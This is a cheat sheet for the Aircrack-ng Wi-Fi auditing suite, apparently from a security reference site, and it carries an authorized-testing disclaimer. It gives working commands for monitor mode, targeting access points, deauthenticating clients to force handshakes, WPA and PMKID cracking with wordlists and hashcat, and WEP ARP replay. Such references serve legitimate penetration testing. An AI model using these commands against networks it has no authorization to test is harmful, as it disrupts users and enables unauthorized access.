Aircrack-ng Cheat Sheet

Wi-Fi security auditing suite — capture with airodump-ng, deauth with aireplay-ng, crack WPA with aircrack-ng.

WirelessaireplayairodumpwifiwpaUpdated 2026-06-02

Overview

Aircrack-ng captures 802.11 traffic and cracks WEP/WPA handshakes. Typical workflow: airodump-ng (capture) → aireplay-ng (deauth to force handshake) → aircrack-ng (offline crack with wordlist). Requires monitor-mode adapter and legal authorization.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y aircrack-ng

Driver must support monitor mode (check: iw list | grep monitor)

sudo airmon-ng check kill   # may disrupt NetworkManager

Essential commands

Enable monitor interface

sudo airmon-ng start wlan0

Scan networks

sudo airodump-ng wlan0mon

Capture on channel for target BSSID

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Common workflows

Terminal 1 — capture (channel 6 example)

sudo airodump-ng -c 6 --bssid TARGET_BSSID -w handshake wlan0mon

Terminal 2 — deauth client to force 4-way handshake

sudo aireplay-ng -0 5 -a TARGET_BSSID -c CLIENT_MAC wlan0mon

With wordlist

aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

Specify ESSID if needed

aircrack-ng -w wordlist.txt -e "NetworkName" handshake-01.cap

PMKID (hashcat often faster) — hcxtools

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

hcxpcapngtool -o hash.22000 pmkid.pcapng

hashcat -m 22000 hash.22000 wordlist.txt

WEP (legacy labs only) —

sudo airodump-ng -c 1 --bssid AP -w wep wlan0mon

sudo aireplay-ng -3 -b AP -h FAKE_MAC wlan0mon   # ARP replay

aircrack-ng wep-01.cap

Cleanup —

sudo airmon-ng stop wlan0mon

sudo systemctl start NetworkManager

Flags: airmon-ng

`airmon-ng start wlan0`	Enable monitor mode (creates wlan0mon)
`airmon-ng stop wlan0mon`	Disable monitor mode
`airmon-ng check kill`	Stop processes that block monitor mode

Flags: airodump-ng

`-c 6`	Fixed channel
`--bssid AA:BB:CC:DD:EE:FF`	Capture only this access point
`-w handshake`	Output file prefix (handshake-01.cap, …)
`wlan0mon`	Monitor interface (last argument)

Flags: aireplay-ng

`-0 5`	Deauthentication attack, 5 packets
`-a AA:BB:CC:DD:EE:FF`	Access point (BSSID)
`-c 11:22:33:44:55:66`	Client MAC (optional)

Flags: aircrack-ng

`-w /usr/share/wordlists/rockyou.txt`	Wordlist for WPA-PSK
`-e "NetworkName"`	ESSID when several networks in the capture
`-b AA:BB:CC:DD:EE:FF`	BSSID when several APs in the .cap

Tips

Use 5 GHz only if adapter supports it (iw dev wlan0 scan | grep MHz).
No handshake without active clients — wait or deauth ethically within scope.
WPA3 / enterprise (802.1X) need different tools (hostapd-wpe, evil twin with caution).
Document channel, BSSID, and capture file hash for reporting.

References

Aide-mémoires similaires

Wi-Fi Hacking cheat sheet